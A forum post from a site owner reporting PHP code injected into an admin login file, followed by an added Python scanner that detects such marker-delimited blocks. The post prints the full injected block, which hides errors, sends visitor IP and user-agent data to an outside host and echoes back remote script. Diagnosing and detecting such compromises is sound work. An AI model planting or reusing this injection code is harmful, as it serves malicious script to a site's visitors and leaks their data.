I discovered that on Dec 25th and on Jan 4th some files were changed on a server account. I found the following code added to the file that is used to log in to an admin side of an admin account:
Code:
<?php
#4f9ad5#
error_reporting(0); ini_set('display_errors',0); $wp_li1101 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_li1101) && !preg_match ('/bot/i', $wp_li1101))){
$wp_li091101="http://"."error"."css".".com/css"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_li1101);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_li091101);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_1101li = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_1101li,1,3) === 'scr' ){ echo $wp_1101li; }
#/4f9ad5#
?>
<?php
?>
<?php
?>
<?php
?>
<?php
?>
<?php
?>
<?php
?>
<?php
?>
<?php
?>
I also saw that several jQuery files were altered; they seemed to have all the '+' operators removed. This would just break the code, and it just didn't seem to make any logical sense.
This account has no other access apart from myself, so it's not as if someone else could have done this without gaining access to the account. The password has been changed, but does anyone have any idea as to what might have been going on?
p.s. Needless to say the files have been replaced, removed and the password changed on the server.
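A scanner for the marker-delimited block shown in the post, as an added example that is not part of the original post: it finds `#id#` ... `#/id#` blocks in PHP source, reports which behaviours of the posted code each block shows, and returns a stripped copy for diffing against a known-good backup. The function names, the constructed sample, and the assumption that other infected files use the same six-hex-digit marker shape are mine.

```python
import re
from pathlib import Path

# Marker pair as in the post: "#4f9ad5#" ... "#/4f9ad5#" (same 6-hex id both ends).
# Assumption: other infected files use the same marker shape with a different id.
BLOCK_RE = re.compile(r"#([0-9a-f]{6})#(.*?)#/\1#", re.S | re.I)
# Empty "<?php ?>" pairs like the ones left after the block in the post.
EMPTY_PHP_RE = re.compile(r"<\?php\s*\?>\s*")
# Behaviours visible in the posted block.
TRAITS = {
    "hides_errors": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    "reads_user_agent": re.compile(r"HTTP_USER_AGENT"),
    "outbound_curl": re.compile(r"curl_exec\s*\("),
    "echoes_remote_response": re.compile(r"echo\s+\$\w+"),
}

def find_injections(source):
    """Return one finding per marker-delimited block: marker id, line, traits."""
    findings = []
    for m in BLOCK_RE.finditer(source):
        traits = sorted(n for n, rx in TRAITS.items() if rx.search(m.group(2)))
        line = source.count("\n", 0, m.start()) + 1
        findings.append({"marker": m.group(1).lower(), "line": line, "traits": traits})
    return findings

def strip_injections(source):
    """Remove marker blocks and leftover empty PHP tags, for diffing against a backup."""
    return EMPTY_PHP_RE.sub("", BLOCK_RE.sub("", source))

def scan_tree(root):
    """Map each .php file under root to its findings; clean files are omitted."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        found = find_injections(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits

# Constructed sample (not the posted file): placeholder marker id and host.
SAMPLE = """<?php
#a1b2c3#
error_reporting(0); $ua = @$_SERVER['HTTP_USER_AGENT'];
$ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://example.invalid/?ua=".urlencode($ua));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $r = curl_exec($ch); curl_close($ch);
if (substr($r,1,3) === 'scr') { echo $r; }
#/a1b2c3#
?>
<?php
?>
<?php
require 'admin/login.php';
?>
"""

if __name__ == "__main__":
    for finding in find_injections(SAMPLE):
        print(finding)
```

The stripped output is meant for comparison with a clean copy, not as a replacement for restoring the file from backup.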